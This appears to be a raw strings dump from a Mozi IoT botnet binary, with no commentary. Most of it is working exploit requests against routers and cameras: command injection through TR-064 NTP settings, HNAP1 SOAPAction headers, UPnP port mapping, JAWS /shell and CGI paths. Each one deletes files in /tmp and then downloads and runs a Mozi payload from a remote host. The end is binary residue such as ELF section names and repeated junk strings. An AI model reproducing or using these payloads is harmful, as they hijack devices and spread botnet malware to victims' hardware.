<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
POST /UD/act?1 HTTP/1.1
Host: 127.0.0.1:5555
User-Agent: Hello, world
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 640
<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
POST /HNAP1/ HTTP/1.0
Host: %s:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://%s:%d/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`
Content-Length: 640
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
User-Agent: Hello, world
Host: %s:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
POST /soap.cgi?service=WANIPConn1 HTTP/1.1
Host: %s:49152
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: Hello, World
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://%s:%d/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope>
GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
192.168.1.1:1234
192.168.3.1:123
192.168.1.1
~_Nt^j
wWFv^b
Oo~NfZ
Oo~NfZ
Oo~NfZ
Oo~NfZ
Oo~NfZ
Oo~NfZ
Oo~NfZ
Oo~NfZ
Oo~NfZ
Oo~NfZ
Oo~NfZ
Oo~NfZ
Oo~NfZ
Oo~NfZ
Oo~NfZ
Oo~NfZ
Oo~NfZ
Oo~NfZ
IdM/<
123888d1:ad2:id2bo
888888
B192.168.1.1:1234
192.168.3.1:123
\x46\x49\x4E\x49\x53\x48
\x46\x49\x4E\x49\x53\x48\x4F\x4B
192.168.1.1:1234
192.168.3.1:123
192.168.1.1
.shstrtab
.rodata
.ARM.extab
.ARM.exidx
.eh_frame
.init_array
.fini_array
.data.rel.ro
.ARM.attributes
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~